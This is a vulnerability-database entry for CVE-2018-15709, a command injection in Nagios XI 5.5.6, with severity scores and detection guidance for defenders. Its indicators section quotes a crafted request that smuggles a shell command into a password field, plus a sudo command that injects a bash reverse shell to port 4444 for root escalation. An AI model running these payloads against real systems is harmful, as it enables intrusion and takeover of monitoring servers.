CVE-2018-15709
published 2018-11-14CVE-2018-15709: Nagios XI 5.5.6 allows remote authenticated attackers to execute arbitrary commands via a crafted HTTP request.
PriorityP264high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EPSS
21.02%
97.3th percentile
Nagios XI 5.5.6 allows remote authenticated attackers to execute arbitrary commands via a crafted HTTP request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nagios | nagios_xi | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttps://192.168.1.208/nagiosxi/ajaxhelper.php?cmd=submitcommand&opts={%22cmd%22:1100,%22cmddata%22:{%22username%22:%22test%22,%22password%22:%22test%27%3bwhoami%20%3E%20/usr/local/nagiosxi/tmp/whoami.txt%3b%27%22},%22cmdtime%22:0,%22cmdargs%22:%22%22}&nsp=30a86418c0953be277b67c5149f9b4be762f08e14a92fcbece756922f5df2312↗
commandsudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp/192.168.1.191/4444 0>&1;'↗
- →Monitor HTTP requests to /nagiosxi/ajaxhelper.php with cmd=submitcommand and cmd value 1100 (COMMAND_NAGIOSXI_SET_HTACCESS), particularly inspecting the 'password' field in the opts JSON body for shell metacharacters (e.g., single quotes, semicolons). ↗
- →Alert on execution of cmdsubsys.php spawning unexpected child processes or shell commands, as the subsystem passes unsanitized input directly to system(). ↗
- →Detect sudo invocations of autodiscover_new.php by the 'apache' or 'nagios' users, especially with --addresses parameters containing shell injection characters (semicolons, redirects, /bin/bash). ↗
- →Watch for outbound TCP connections from the Nagios XI server to unexpected external IPs on port 4444, indicative of a reverse bash shell established via the autodiscover_new.php LPE chain. ↗
- →Flag creation of unexpected files under /usr/local/nagiosxi/tmp/ (e.g., whoami.txt) as evidence of successful command injection via cmdsubsys.php. ↗
- ·The vulnerability is exploitable by low-privileged (non-admin) authenticated users, not just administrators, broadening the attacker surface beyond privileged accounts. ↗
- ·The sudoers configuration grants both the 'nagios' and 'apache' OS users passwordless sudo rights to autodiscover_new.php, meaning compromise of either user (e.g., via CVE-2018-15708 or CVE-2018-15709) is sufficient for full root escalation. ↗
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No public exploits indexed.
2018-11-14
Published